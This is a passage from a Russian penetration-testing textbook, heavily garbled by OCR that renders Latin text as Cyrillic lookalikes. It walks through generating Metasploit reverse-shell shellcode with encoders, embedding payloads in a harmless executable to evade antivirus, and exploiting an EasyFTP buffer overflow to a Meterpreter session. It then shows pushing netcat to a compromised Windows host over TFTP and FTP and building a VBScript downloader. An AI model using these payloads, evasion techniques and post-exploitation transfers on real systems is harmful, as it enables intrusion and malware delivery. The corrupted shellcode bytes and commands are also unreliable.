# РгерепсІ5е1;ге§ісІ=-ЕаІ5е, РгерепсІ5е'(;§ісІ=ГаІ5е, 

# РгерепсІСІігоо1:Вгеак=-ЕаІ5е, АррепсІЕхі1;=ГаІ5е, 

# ІпіЕіа1Аи1:оГСип5сгір-1:=, АиЕоКип5сгір1:= 

ЬиГ = 

"\х24\х0Г\хГ-р\хГа\х01\хе0\х78\х27\х21\хе4\хГГ\хГсІ\х21\хе5" + 
"\хГГ\хГсі\х28\х06\хГГ\хГ-Р\х24\х02\х10\х57\х01\х01\х01\х0с" + 

" \хаГ\ха2\хГ-р\хГГ\х8Г\ха4\хГГ\х'р-Е\х34\х0Г\хГ-Е\хГсІ\х01\хе0" + 
"\х78\х27\хаГ\хаГ\хГГ\хе0\хЗс\х0е\х0сІ\х7Г\х35\хсе\х0сІ\х7-Е" + 
"\хаГ\хае\хГ-р\хе4\хЗс\х0е\хс0\ха8\х35\хсе\х0а\х01\хаГ\хае" + 
"\хГГ\хе6\х27\ха5\хГГ\хе2\х24\х0с\хГ-р\хеГ\х01\х80\х30\х27" + 
"\х24\х02\х10\х4а\х01\х01\х01\х0с\х24\х11\хГГ\хГсІ\х02\х20" + 
"\х88\х27\х8Г\ха4\хГГ\хГ-р\х02\х20\х28\х21\х24\х02\х0Г\хсІГ" + 
"\х01\х01\х01\х0с\х24\х10\хГГ\хГ-Е\х22\х31\хГ-Е\хГ-р\х16\х30" + 
"\хГГ\хГа\х28\х06\хГГ\хГ-р\хЗс\х0Г\х2-р\х2Г\х35\хе-р\х62\х69" + 
"\хаГ\хаГ\хГ-р\хес\хЗс\х0е\хбе\х2Г\х35\хсе\х73\х68\хаГ\хае" + 
"\хГГ\хГ0\ха-Е\ха0\хГГ\хГ4\х27\ха4\хГ-р\хес\хаГ\ха4\хГГ\х'Е8" + 
"\хаГ\ха0\хГ-р\хГс\х27\ха5\хГГ\хГ8\х24\х02\х0Г\хаЬ\х01\х01" + 

"\Х01\Х0С" 

тзГ рау1оасІ(5Еіе11_геѵег5е_1:ср) > 

Еще один аспект, который мы хотим осветить в данном разделе, — это количество 
шифрований. Проще говоря, сколько раз Меіазріоіі зашифрует наш код. Это не¬ 
обходимо для того, чтобы сделать его более скрытным, то есть менее заметным для 
антивирусных программ. 

тзГ рау1оасІ(5Ііе11_геѵег5е_1:ср) > §епегаЕе -о ЕР0КТ=3455, ЕН05Т=192.168.10.1 -Ь ’\ 

Х00' - іб 

# 1іпих/тірзЬе/5Еіе11_геѵегзе_1;ср - 276 ЬуЕез 

# ЕіЕЕр : //мілм.теЕазрІоіЕ .сот 

# Епсосіег: тірзЬе/1оп§хог 

# ѴЕКВ05Е=Га1зе, І.Н05Т=192. 168.10.1, ЕР0КТ=3455, 

# КеѵегзеА11омРгоху=Га1зе, КеѵегзеСоппес'І:Ке1:гіе5=5, 

# КеѵегзеЕізЕепегТНгеасІес^-ВаІзе., РгерепсіЕогк=-РаІ5е, 

# РгерепсІ5е1:ге5иісІ=ГаІ5е, РгерепсІ5е1:геиісІ=-РаІ5е, 

# РгерепсІ5е1:иісІ=ГаІ5е, РгерепсІ5е1:ге5§ісІ=ГаІ5е, 

# РгерепсІ5е1:ге§ісІ=-РаІ5е, РгерепсІВеІзісІ^ГаІзе, 
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# Ргерепс1Сіігоо1:Вгеак=-РаІ5е, АррепсІЕхіІ^-РаІзе, 

# Іпі1:іа1Аи1;оКип5сгір-1;=, АиіоКип5сгір-1:= 

ЬиГ = 

"\х24\х0е\хРР\хсР\х01\хс0\х70\х27\х24\х0Ь\хРР\хЬ7\х05\х10" + 
"\хРР\хРР\х28\х08\х82\х82\х01\х60\х58\х27\х03\хеЬ\хс8\х21" + 
"\х28\х17\х82\х82\х8Р\х31\хРР\хРс\х24\х0сІ\хРР\хРЬ\х01\ха0" + 
"\х68\х27\х21\хаР\хРР\хРсІ\х8Р\х28\хРР\хРс\х02\хеР\хЬ8\х21" + 
"\х01\х11\х18\х26\х02\хее\хР0\х2Ь\хаР\х23\хРР\хРс\х21\ха6" + 
"\хРР\хРР\х17\хс0\хРР\хР9\х03\х2сІ\хс8\х21\х24\х02\х10\хЗЗ" + 
"\х01\х4а\х54\х0с\х36\хбс1\хс13\хеа\х12\х62\х2с\х10\х37\х8с1" + 
"\хаЬ\хссі\х17\х89\х2с\х17\х17\х88\х2с\х17\х1е\х6Ь\х2с\х15" + 
"\х12\х6Р\хсЗ\хЬсІ\х37\х6с\хсІ2\хе6\х99\хсР\х2с\х15\хЬ9\хс9" + 
"\х2с\х15\х02\х62\х2с\х17\х37\х8сІ\хаЬ\хссІ\х99\хс2\х2с\х0а" + 
"\х0а\х63\хсіе\х95\х03\ха3\хсіе\х95\х99\хс3\х2с\х0е\х0а\х63" + 
"\х13\х42\х03\хаЗ\хсІ9\хеЬ\х99\хсЗ\х2с\х0с\х11\хс8\х2с\х08" + 
"\х12\х61\х2с\х05\х37\хесІ\хеЗ\хссІ\х12\х6Р\хсЗ\ха0\х37\х6с" + 
"\хсі2\хе6\х12\х7с\х2с\х17\х34\х4сІ\х5Ь\хссІ\хЬ9\хс9\х2с\х15" + 
"\х34\х4сІ\хРЬ\хсЬ\х12\х6Р\хсІс\х35\х37\х6с\хсі2\хе6\х12\х7сІ" + 
"\х2с\х15\х14\х5с\х2с\х15\х20\х5сі\х2с\х10\х1е\х6Ь\х2с\х15" + 
"\х0а\х62\хРс\хс5\х03\х82\хЫ\х83\х99\хс2\х2с\х06\х0а\х63" + 
"\хЬсІ\хс5\х03\хаЗ\ха0\х82\х99\хсЗ\х2с\х1а\х99\хссІ\х2с\х1е" + 
"\х11\хс9\х2с\х06\х99\хс9\х2с\х12\х99\хссІ\х2с\х16\х11\хс8" + 
"\х2с\х12\х12\х6Р\хсІс\х41\х37\х6с\хсІ2\хе6" 
тз-р рау1оасі(5Ііе11_геѵег5е_і:ср) > 

Однако не стоит увлекаться увеличением количества проходов: ведь объем полез¬ 
ной нагрузки ограничен, и при каждом проходе шифровальщика он увеличивается. 

Исполняемый код. Меіазріоіі может не просто сгенерировать нужный код полезной 
нагрузки, но и выдать ее в виде различных файлов. Это могут быть файлы типа 
азр, сІП, ехе, ѵЬз и т. д. В следующем примере мы создадим исполняемый файл, со¬ 
держащий в себе полезную нагрузку. После запуска на целевой системе он создаст 
обратное соединение с компьютером атакующего. 

Также перед демонстрацией стоит упомянуть о шифровальщиках. Вывести на экран 
их полный список можно командой зЬо\ѵ епсосіегз. 

тзР > зііои епсосіегз 


Епсосіегз 


ІМате 


Оізсіозиге ОаРе Капк 


Резсгіріііоп 


стсІ/есНо 

стсІ/§епегіс_5Іі 


§ООСІ 

тапиаі 


ЕсНо Соттапсі Епсосіег 
Сепегіс Зііеіі ѴагіаЬІе 


ЗиЬзіііиІііоп Соттапсі Епсосіег 
стсІ/іРз 


Іом 


Сепегіс ${ІР5} 


ЗиЬзШиПоп Соттапсі Епсосіег 
стсі/регі 

стсІ/ромег5Ііе11_Ьа5е64 


погтаі Регі Соттапсі Епсосіег 
ехсеНепі Ромегзііеіі Вазе64 


Соттапсі Епсосіег 

стсІ/ргіп1;Р_рИр_тл 


тапиаі ргіпіНі) ѵіа РНР 


та§іс_лиоі;е5 тііііу Соттапсі Епсосіег 
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§епегіс/еісаг 

тапиаі 

ТНе ЕІСАК Епсосіег 

§епегіс/попе 

погтаі 

ТИе "попе" Епсосіег 

тір5Ье/Ьу1:е_хогі 

погтаі 

Вуіе ХОКі Епсосіег 

тір5Ье/1оп§хог 

погтаі 

ХОК Епсосіег 

тір5Іе/Ьу1:е_хогі 

погтаі 

Вуіе ХОКі Епсосіег 

тір5Іе/1оп§хог 

погтаі 

ХОК Епсосіег 

рЬр/Ьа5е64 

§геаі 

РНР Вазе64 Епсосіег 

ррс/1оп§хог 

погтаі 

РРС І_оп§ХОК Епсосіег 

ррс/1оп§хог_Та§ 

погтаі 

РРС І_оп§ХОК Епсосіег 

5рагс/1оп§хог_1:а§ 

погтаі 

5РАКС ОІдІОКР ХОК 

Епсосіег 



Х64/ХОГ 

погтаі 

ХОК Епсосіег 

х64/ги1;-(;о_сіекіги 

тапиаі 

гиТТо Эекіги 

х86/агісІ_5иЬ 

тапиаі 

АсІсІ/5иЬ Епсосіег 

х86/а1рІіа_тіхесІ 

ІОИ 

А1ркіа2 АІрІіапитегіс 

Міхесісазе Епсосіег 



х86/а1рІіа_иррег 

ІОИ 

А1ркіа2 АІрІіапитегіс 

ІІррегсазе Епсосіег 



х86/аѵоісІ_ипсІег5соге_1:о1оиег 

тапиаі 

АѵоісІ ипсіегзсоге/ 

Тоіомег 



х86/аѵоісІ_и1:Г8_1;о1омег 

тапиаі 

АѵоісІ 11ТР8/То1омег 

х86/Ыохог 

тапиаі 

ВІоХог - А МеТатогрЬіс 

Віоск ВазесІ ХОК Епсосіег 



Перед шифрованием Меіазріоіі самостоятельно выберет наиболее подходящий тип 

шифровальщика, однако машинам, так же как и людям, 

свойственно ошибаться. 

Поэтому в нашем примере будет указано, 

каким именно шифровальщиком мы 

хотим воспользоваться, — пусть это будет зЬікаіа §а паі. 

тзГ рау1оасІ(5Ііе11_геѵег5е_1:ср) > §епегаіе -о 

ЕН05Т=192.168, 

.10.5 -е х86/5Іііка-|:а_§а_ 

паі -с 9 -і: ехе -і /гоо1:/геѵег5_5Не11 . ехе 




[*] Игі1:іп§ 73802 Ьуіез Іо /гоо1:/геѵег5_5Ііе11. ехе... 

Теперь проверим сгенерированный файл антивирусами и увидим, что практически 
все они распознали вредоносный код. 


И лгиБІоІаІ 


5НЛ256: 9Л41 Б2с8Ь778с4о84410с44<І82Ь76о2с3634Ы46<ИЬоЗЬ&83Г3196602745ал7 

III* пате: гвѵег5_іЬв<І.вхе 

Огіѵсікмі іаііо. 44/56 

Апяіу.чія <1я(в- 2016-11 -гз 10-46-11 1/ТС (О тіпиім адл ) 



Рис. 11.2. Результат проверки файла сервисом ѴігизТоІаІ 


Теперь сгенерируем тот же код, но инкапсулируем его в безобидный исполняемый 
файл. 
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т5"Р рау1оасІ(5Ье11_геѵег5е_1:ср) > §епегаТе -о І_Н05Т=192 .168.10.5 -Ь '\хвв' -е х86/ 
5Міка1:а_§а_паі -с 8 -х /гооТ/0омп1оасІ5/ри1:1;у.ехе -Т ехе -Т /гоо1:/геѵег5_5Не11 . ехе 
[*] Ыгі1;іп§ 531368 ЬуТез То /гоо1;/геѵег5_5Ие11.ехе. .. 

Как видно, в результате инкапсуляции количество антивирусов, которые смогли 
распознать вредоносный код, существенно уменьшилось. 

ІЯѵігигІоІаІ 


КНА/’ЬЬ 1 

еі /ЛкчХоня/осЫл^бАсьблі /яньиішидяюі /(Иячзг.Ят ьоі і ьогіьмляе 


Ріів пат». 

гуѵшв кішіі.ѵх» 


Осіссііоп гаію: 

30/56 

©ГО © 0 

Апаіузіз с)а?е: 

2010-11-23 11:22:00 ШС (1 тітлеадо) 



Рис. 11.3. Результат проверки файла с внедренным кодом сервисом ѴігизТоІіаІ 


Такой хороший результат работы антивирусов обусловлен тем, что Меіазріой со¬ 
держит хорошо известные эксплойты. Если вы действительно хотите обойти анти¬ 
вирус, то необходимо создавать свой уникальный код или искать новые эскплойты, 
еще неизвестные широкому кругу специалистов. 


Практические навыки 

Теперь, когда мы показали, как пользоваться отдельными частями Меіазріой, 
пришла пора собрать все вместе и продемонстрировать генерацию эксплойта с по¬ 
лезной нагрузкой и взлом целевой системы. 

На прошлом шаге мы уже нашли уязвимый ЕТР-сервер. Теперь выберем нужный 
эксплойт и сконфигурируем его. 

тзТ аихі1іагу(Т1:р_1о§іп) > изе міпсІом5/-Р1:р/еа5у-Р1:р_сисІ_Ріхге1: 
тзТ ехрІоіПеазуТІір-СмсІ-ТіхгеІ:) > іпТо 

Мате: ЕаауРТР 5егѵег СІдЮ СоттапсІ ЗТаск ВиТТег ОѵегТІом 
Мосіиіе: ехр1оіТ/міпсіом5/-Е1:р/еа5у-Р1:р_смсІ_Еіхге1: 

РІаТТогт: Ыіпсіомз 
Ргіѵі1е§есі: N 0 

Исепае: Меіазріоіі: Егатемогк Ьісепае (В5Э) 

Капк: СгеаТ 
0І5СІО5ѲСІ: 2010-02-16 

Ргоѵісіесі Ьу: 

Раиі Максшзкі <ту.Ііпсі1@@таі1.сот> 

З'сіиск <^сІиск@те1:а5р1оі1:. сот> 


АѵаіІаЬІе Таг§е1:5: 
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ІсІ ІМате 


0 ІЛІІПСІОМ5 

1 ІЛІІПСІОМ5 

2 ІЛІІПСІОМ5 

3 ЫІПСІОМ5 

4 ІЛІІПСІОМ5 

5 ІЛІІПСІОМ5 

6 ІЛ/ІПСІОМ5 

7 ІЛІІПСІОМ5 

8 ІЛІІПСІОМ5 

9 ІЛІІПСІОМ5 


Ііпіѵегзаі 

Ііпіѵегзаі 

Ііпіѵегзаі 

Ііпіѵегзаі 

Ііпіѵегзаі 

Ііпіѵегзаі 

Ііпіѵегзаі 

Ііпіѵегзаі 

Ііпіѵегзаі 

Ііпіѵегзаі 


- ѴІ.7.0.2 

- ѵі.7.0.3 

- ѵі.7.0.4 

- ѵі.7.0.5 

- ѵі.7.0.6 

- ѵі.7.0.7 

- ѴІ.7.0.8 

- ѴІ.7.0.9 

- ѴІ.7.0.10 

- ѵі.7.0.11 


Вазіс орГіопз: 


Мате 

СиггепГ 5еГГіп@ 

Келиігес) 

ОезсгірТіоп 

РТРРА55 

то 2 І 11 а@ехатр 1 е. сот 

ПО 

ТЬе раззмогсі Гог ГЬе зресіГіесІ иаегпате 

РТР115ЕК 

апопутоив 

по 

ТЬе иаегпате Го аиГЬепГісаГе аа 

КН05Т 


уев 

ТЬе Таг@еТ асісігеаа 

КРОКТ 

21 

уев 

ТЬе Таг§еТ рогГ 


Рауіоасі іпГогтаііоп: 
Брасе: 450 
Аѵоісі: 4 сЬагасГегз 


ОезсгірТіоп: 

ТЬіз тосіиіе ехріоігз а зГаск-ЬазесІ ЬиГГег оѵегИом іп ЕазуРТР 5егѵег 
1.7.0.11 апсі еагііег. ЕазуРТР Гаііз Іо сЬеск іприГ зіге мЬеп рагзіп§ 
’СШ' соттапсіз, мЫсЬ Іеасіз Іо а зГаск ЬазеЬ ЬиГГег оѵегПом. 

ЕазуРТР аііомз апопутоиз ассезз Ьу сІеГаиІГ; ѵаіісі сгесІепТіаІз аге 
Гурісаііу иппесеззагу Іо ехріоіг ГЬіз ѵиІпегаЬіІіГу. АГГег ѵег5іоп 
1.7.0.12, ГЬіз раскате маа гепатесі "ІІрІизРГр". ТЬіз ехріоіг иГіІігез 
а зтаіі ріесе оГ сосіе ГЬаГ І\'ѵе геГеггесі Іо аз 'ГіхКеГ'. ТЬіз сосіе 
аііома иа Іо іп^есГ оГ рауіоасі оГ ~500 ЬуГез іпГо а 264 ЬуГе ЬиГГег 
Ьу Тіхіп§' ГЬе геГигп асісігезз розГ-ехрІоіГаГіоп. 5ее геГегепсез Гог 
тоге іпГогтаГіоп. 


КеГегепсез : 

05\ДЭВ (62134) 

ЬГГр: //мміді. аесигіГуГосиа. сот/Ьісі/38262 

ЬГГр: //раиітакомакі.могсіргеаа. сот/2010/02/28/іпсгеазіп§-рауіоасі-зіге-м-геГигп- 
асІсІгезз-оѵепл/гіГе/ 

ЬГГр: //раиітакомакі.могсіргеаа. сот/2010/04/19/теГазр1оіГ-р1и@іп-Гог-еазуГГр- 
аегѵег-ехрІоіГ 

ЬГГр://зесІізГз.ог§/Ьи§Ггал/2010/РеЬ/202 

таГ ехр1оіГ(еазуГГр_смсІ_ГіхгеГ) > зеГ КН05Т 192.168.225.1 

КН05Т => 192.168.225.1 

таГ ехр1оіГ(еазуГГр_смсІ_ГіхгеГ) > 


Просмотрим варианты шелл-кодов и выберем нужный нам. 

тзГ ехр1оіГ(еазуГГр_сілкі_ГіхгеГ) > зЬои рауіоасіа 


СотраГіЫе Рауіоасіа 
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ІМате 

Резспірііоп 


Різсіозипе Раіе Капк 


§епепіс/сизіот погтаі 

Сизіот Рауіоасі 

§епепіс/сІеЬи§_іпар погтаі 

бепепіс х86 РеЬи§ Тгар 

§епепіс/зНе11_ЬіпсІ_іср погтаі 

бепегіс СоттапсІ 5Ие11^ ВіпсІ ТСР Іпііпе 

§епепіс/зНе11_пеѵепзе_іср погтаі 

бепегіс СоттапсІ 5Ріе11, Кеѵепзе ТСР Іпііпе 

§епепіс/іі@Ііі_1оор поптаі 

бепегіс х86 Ті§Ні Іоор 

міпсіоіл/5/сІ11іп]есі/Ьіпсі_ІіісІсІеп_іркпоск_іср поптаі 

Ке-РІесііѵе ЭИ Іпз'есііоп, Нісісіеп ВіпсІ Іркпоск ТСР 5іа§еп 

міпсІоіл/5/сІ11іп]есі/Ьіпсі_ІіісІсіеп_іср поптаі 

Ке-РІесііѵе РИ Іпз'есііоп, Нісісіеп ВіпсІ ТСР 5іа§еп 

міпсІои5/сІ11іп]есі/Ьіпсі_ірѵ6_іср поптаі 


Ке-РІесііѵе РИ Іпз'есііоп, ВіпсІ ІРѵб ТСР 5іа@еп (Ілііпсіомз х86) 


После того как мы определились с нагрузкой, проверим параметры и поэксплуа¬ 
тируем уязвимость в РТР-сервере. 

тз-р ехр1оіі(еазуРір_смсІ_Ріхпеі) > зеі РАѴЮАР міпсІои5/теіепрпеіеп/Ьіпсі_іср 

РАѴШАР => міпсІои5/теіепрпеіеп/ЬіпсІ_іср 

тзР ехр1оіі(еазуРір_смсІ_Ріхпеі) > зРюи орііопз 

Мосіиіе орііопз (ехр1оіі/міпсіом5/Рір/еа5уРір_смсі_Ріхпеі): 


ІМате Сиппепі 5еіііп§ Кериінесі 


РТРРА55 то2І11а@ехатр1е.сот по 
РТРІІ5ЕК апопутоиз по 
КН05Т 192.168.225.1 уез 
КРОКТ 21 уез 


Резспірііоп 


ТНе рагзмопсі -Рог іРіе зресіРіесІ изеппате 
ТНе изеппате іо аиіііепіісаіе аг 
ТНе іан§еі асісіпезз 
ТНе іан§еі ропі 


Рауіоасі орііопз (ілііпсІомз/теіепргеіеп/Ыпсі іср): 


ІМате Сиппепі 5еіііп§ Кериіпесі 


ЕХІТРШ\ІС рпосезз уез 

рпосезз, попе) 

ЕРОКТ 4444 уез 

КН05Т 192.168.225.1 ПО 


Резспірііоп 

Ехіі іесііпірие (Ассеріесі: ", зеН, іРіпеасІ, 

ТИе Изіеп ропі 
ТРіе іап§еі асісіпезз 


Ехріоіі іап§еі: 
ІсІ ІЧате 


0 Ыіпсіомз ІІпіѵепзаІ - ѵі.7.0.2 
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тзГ ехр1оі1;(еа5уГ-1;р_сідісІ_-( : іхге-1;) > ехріоіі 
[*] 5Таг1:есІ ЬіпсІ Ііапсііег 

[*] 192.168.225.1:21 - РгерепсІіп§ ГіхКеІ... 

[*] 192.168.225.1:21 - АсШп§ ТНе рауіоасі... 

[*] 192.168.225.1:21 - 0ѵегмгі1:іп§ рагТ оГ ТНе рауіоасі иіііі 1аг§е1: асісігезз... 
[*] 192.168.225.1:21 - 5епсІіп§ ехріоіі ЬиГГег... 

[*] 5епсІіп§ зіа^е (748032 ЬуТез) 

[*] Меіегргеіег зеззіоп 1 орепесі (192.168.225.128:4444 -> 192.168.225.1:62853) 

теТегргеІіегззузіпГо 

СотриТег: ТЕ5Т 

05 : МІПСІОИ5 7 (Виіісі 7601,5егѵісе Раск 1). 

АгсНИесТиге : х86 
ЗузТет І_ап§иа§е : еп_ІІ5 
МеТегргеТег : х86/міп32 


Резюме 

Меіазріоіі является универсальным инструментом для проведения аудита безопас¬ 
ности. Данный фреймворк постоянно поддерживается и обновляется. Основная 
работа с бесплатной версией происходит через командный интерфейс с исполь¬ 
зованием тзісошоіе, однако не забывайте о наличии графического интерфейса 
Аппітаде: информацию проще усвоить, когда она представлена в графическом виде. 

Помните, что Меіазріоіі состоит из ядра, которое обеспечивает совместную работу 
следующих подключаемых компонентов: 

□ Интерфейсы: консольный и графические; 

□ Модули: 

• эксплойты (обеспечивают возможность эксплуатации найденной уязви¬ 
мости); 

• полезная нагрузка (программа, которая запускается после успешной работы 
эксплойта и выполняет переделенную функцию, например создание пользо¬ 
вателя, открытие порта ит.д.); 

• вспомогательные модули (сканер портов, перебор паролей, анализ трафика 
и т. д.); 

• энкодеры (позволяют скрыть вредоносный код от систем защиты путем его 
многократного преобразования) и т. д. 

□ Расширения — позволяют значительно расширить функционал Мсіазріоіі . 
Основные команды Меіазріоіі: 

□ Ъаск — используйте, чтобы вернуться к предыдущему контексту после того, как 

вы закончили работу с модулем или выбрали неверный модуль; 
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□ сЬеск — проверяет уязвимость целевой системы перед выбранным эксплойтом; 

□ соппесі: — подключение к удаленной системе 

□ есій — правка в установленном графическом или текстовом редакторе; 

□ ехіі — закончить работу; 

□ Ьеір — выведет справку о доступных командах; 

□ і п Го — выведет на экран информацию о модуле; 

□ ]оЬз — позволяет управлять запущенными задачами; 

□ кііі — остановит запущенную задачу; 

□ Іоасі — загрузит нужное расширение из директории Меіазріой; 

□ зеагсЬ — поиск модулей; 

□ зеі: — установить необходимое значение; 

□ изе — выбрать и начать работать с конкретным модулем. 

Обязательно ознакомьтесь с прекрасным бесплатным курсом от Оііепзіѵе 
Зесигйу — кйр8://№іе)шо//етіѵе-$есигііу.сот/теіа$рІоі{-ипІеа$ке(і/. 




Передача файлов 


Зачастую после проведения успешной атаки на целевую систему появляется не¬ 
обходимость загрузить в нее один или несколько файлов. Это может быть все что 
угодно, например вирус, сниффер, клавиатурный шпион или шелл-код для эксплу¬ 
атации очередной уязвимости. Однако это не всегда бывает просто, и в этой главе 
мы рассмотрим несколько вариантов достижения данной цели. 

Прежде чем мы начнем, следует упомянуть одно серьезное препятствие, которое 
вы можете встретить на своем пути, — антивирус. В любой более-менее серьезной 
организации он по умолчанию устанавливается на все компьютеры и серверы. Ос¬ 
новной принцип их работы — сравнение цифровой подписи файла с той, что содер¬ 
жится в их базе данных, и если совпадение будет найдено, то файл автоматически 
удаляется. Но это лишь полбеды, хуже, если антивирусы управляются централи¬ 
зованно, тогда администратор сети сразу же получит уведомление о происходящей 
атаке на систему. Есть два варианта обхода такого вида защиты. Первый способ: 
если вы решили загрузить, например, вирус, то лучше ему быть уникальным, а не 
созданным одним из бесчисленных генераторов. Второй способ — использовать 
легальные инструменты, которые не вызовут подозрений у антивируса. 

Но остановимся на передаче файлов. После того как вы получили доступ к команд¬ 
ной строке атакованной системы, первое, с чем вы столкнетесь, — это нехватка необ¬ 
ходимых инструментов для управления и продолжения атаки. С ІЖІХ-ігодобпыми 
системами проще, так как для скачивания вы всегда найдете такие утилиты, как 
\ѵ§еІ, сигі и петсаі:, а вот с ѴѴіінІоѵѵя все немного сложнее. 


ТРТР 


Это тривиальный протокол для передачи файлов. Он прост в реализации, не под¬ 
держивает аутентификацию и основан на транспортном протоколе ЕГОР 

РТР работает в интерактивном режиме, и для его использования требуются опре¬ 
деленные действия со стороны пользователя. Но, к сожалению, такой режим за- 
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частую недоступен сразу же после взлома системы, поэтому существует реальная 
необходимость использовать ТРТР. Он хорош тем, что с ним можно работать в не¬ 
интерактивном режиме. 

Для того чтобы скачать файл с ТРТР-сервера, необходимо для начала создать 
последний. В Каіі Рігшх присутствует встроенный сервер аі:Гі рсі , запустим его на 
порте 69 и разместим в его директории пеіхаі;. 

гооТ@ка1і :~# тксііг /гооГ/ТТТр 

гооТ@ка1і :~# аГТТрсі --сіаетоп -рогТ 69 /гооТ/ГТТр/ 
гооТ@ка1і:~# ср /изг/зЬаге/міпсІомз-Ьіпагіез/пс . ехе /гооТ/ТТГр/ 

Теперь загрузим пеіхаі; на скомпрометированную машину. 

С: \ІІ5егз\ТезТ>ГТТр -і 192.168.225.128 §еТ пс.ехе 

ТгапзТег зиссеззТиІ: 59392 ЬуГез іп 16 зесопсДз), 3712 ЬуТез/з 


РТР 

РТР — это протокол передачи данных, работающий на основе ТСР, он является 
более безопасным и функциональным по сравнению с ТРТР. Еще одним его пре¬ 
имуществом является то, что клиент для работы с ним по умолчанию включен 
в ОС \ѴІПСІО\Ѵ5. 

Как и в предыдущем примере, начнем с конфигурации на своей машине сервера, 
поддерживающего данный протокол. В связи с тем что данный сервис обладает 
более широкой функциональностью, это займет немного больше времени. 

гооТ@ка1і:~# арХ-§е1; іпзТаІІ риге-ТТрсІ 
Кеас1іп§ раскате 1І5Т5... Эопе 
Виі1сііп§ ЬерепЬепсу Тгее 
Кеас1іп§ зТаіе іпТогтаТіоп... Эопе 

ТЬе То11оміп§ асісіітіопаі раска§ез мііі Ье іпзТаІІесІ: 
риге-ТТрсІ-соттоп 

ТЬе То11оміп§ МЕЫ раска§ез мііі Ье ІпзТаІІесІ: 
риге-ТГрсі риге-ТТрсі-соттоп 

0 ир§гасіес1, 2 пеміу ІпзТаІІесІ, 0 іо гетоѵе апЬ 0 поТ ир§гасіесі. 

ирсІаТе-гс .сі: Аз рег Каіі роіісу, риге-ТТрсІ іпіТ зсгірТ із ІеТТ сіізаЫесі. 

іпззегѵ: магпіп§: сиггепТ зТагТ гипіеѵеі(з) (етрТу) оТ зсгірТ 'риге-ТТрсГ оѵеггісіез 

Ь5В сіеТаиІТз (2 3 4 5). 

іпззегѵ: магпіп§: сиггепТ зТор гипіеѵеі(з) (0 1 2 3 4 5 6) оі зсгірТ ' риге-ТТрсІ’ 
оѵеггісіез Ь5В сіеТаиІТз (0 1 6). 

Ргосеззіп§ Тгі§§егз Тог зузіетсі (231-9) ... 
гооТ@ка1і:~# §гоирасІсІ ТТр§гоир 

гооТ@ка1і:~# изегасісі -§ ТТр§гоир -сі /сіеѵ/пиіі -з /еіс ТТризег 
гооТ@ка1і:~# тксііг /Ьоте/ТТризегз 
гооТ@ка1і:~# тксііг /Ьоте/ТТризегз/^ое 

гооТ@ка1і:~# риге-рм изегасісі ]ое -и ТТризег -сі /Ьоте/ТТризегз/зое 
Раззмогсі: 123456 
ЕпТег ІТ а§аіп: 123456 
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гооѣ@ка1і:~# риге-ри тксІЬ 

гооѣ@ка1і:~# 1п -5 /еѣс/риге--РѣрсІ/с:опР/РигеОВ /еѣс/риге-РѣрсІ/аиѣіі/РигеОВ 
гооѣ@ка1і:~# сРюмп -МК Рѣризег:Рѣр§гоир /Ііоте/Рѣризегз/ 
гооѣ@ка1і:~# @кзисІо ригеасітіп 
гооѣ@ка1і:~# зузѣетсѣі гезѣагѣ риге-Гѣрсі 

гооѣ@ка1і:~# ср /изг/зііаге/міпсіомз-Ыпагіез/пс. ехе /Рюте/-Рѣризегз/;іое/ 
гооѣ@ка1і:~# Рѣр ІосаІНозѣ 
СоппесѣесІ ѣо ІосаІІюзѣ. 

220-Ідіеісоте Іо Риге-РТРсі [ргіѵзер] [ТѢ5] - 

220-Ѵои аге изег питЬег 1 оГ 50 аііомесі. 

220-ѣосаІ ѣіте із пом 07:54. 5егѵег рогѣ: 21. 

220-ТНіз І5 а ргіѵаѣе зузѣет - N 0 апопутоиз 1о§іп 

220 Ѵои мііі Ье сіізсоппесѣесі а-Рѣег 15 тіпиѣез оГ іпасѣіѵіѣу. 

ІМате (ІосаІІіозѣ: гооѣ): дое 

331 ІІзег зое ОК. Раззмогсі гелиігесі 

Раззмогсі: 123456 

230 ОК. Сиггепѣ сіігесѣогу із / 

Итак, мы установили и сконфигурировали сервис, а также создали домашнюю ди¬ 
ректорию и пользователя. Напоследок мы протестировали наш сервер и убедились 
в его работоспособности. 

Теперь создадим на скомпрометированной машине файл с набором команд, необ¬ 
ходимых для загрузки файла. Без этого не обойтись в том случае, если нам не будет 
доступна командная строка, работающая в интерактивном режиме. 

С: \ІІ5егз\ѣезѣ>есііо ореп 192.168.225.128 21> Рѣр.ѣхѣ 
С: \ІІ5егз\ѣезѣ>есІіо ]'ое>> Рѣр.ѣхѣ 
С: \ІІ5егз\ѣезѣ>есііо 123456>> Рѣр.ѣхѣ 
С: \ІІ5егз\ѣезѣ>есІіо Ып>> Рѣр.ѣхѣ 
С: \ІІ5егз\ѣезѣ>есІіо СЕТ пс.ехе>> Рѣр.ѣхѣ 
С: \ІІ5егз\ѣезѣ>есІіо Ьуе>> Рѣр.ѣхѣ 
С: \ІІзегз\ѣезѣ>Рѣр -з:Рѣр.ѣхѣ 


Загрузка файлов с использованием скриптов 

Загрузить файлы можно с использованием ѴВ и Ро\ѵег5Ье11-скриптов. Для примера 
создадим скрипт, который не будет требовать от пользователя никаких дополни¬ 
тельных действий, а значит, он неинтерактивен. Данный скрипт загрузит заранее 
размещенный нами на веб-сервере файл, используя НТТР. 

С: \ІІ5егз\ѣезѣ>есІіо 5иЬ НТТР0омп1оасІ( туІІКѢ, туРаѣІі )> сіомпіоасіег. ѵЬз 
С: \ІІ5егз\ѣезѣ>есІіо ' Ілігіѣѣеп Ьу КоЬ ѵап сіег ІлІоисІе>> сіомпіоасіег.ѵЬз 
С: \ІІ5егз\ѣезѣ>есІіо Ріт і, оіДРіІе, оЬ]'Р50, оІДНТТР, зѣгРіІе, зѣгМз§>> сіомпіоасіег. 
ѵЬз 

С: \ІІ5егз\ѣезѣ>есІіо Сопзѣ РогКеасііп§ = 1, РогІлІгіѣіп§ = 2, РогАррепсІіп§ = 8>> 
сіомпіоасіег. ѵЬз 

С: \ІІ5егз\ѣезѣ>есІіо Беѣ оЬ]'Р50 = СгеаѣеОЬ]'есѣ( "5сгірѣіп§.РіІеБузѣетОЬзесѣ" )>> 
сіомпіоасіег. ѵЬз 

С:\ІІ5егз\ѣезѣ>есІіо ІР оЬ]Р50.Ро1сІегЕхі5ѣ5( туРаѣИ ) ТИеп>> сіомпіоасіег.ѵЬз 
С: \ІІ5егз\ѣезѣ>есІіо зѣгРіІе = оЬ]'Р50. ВиіІсІРаѣИ( туРаѣіі, Місі( туІІКѢ, Іп5ѣгКеѵ( туІІКѢ, 
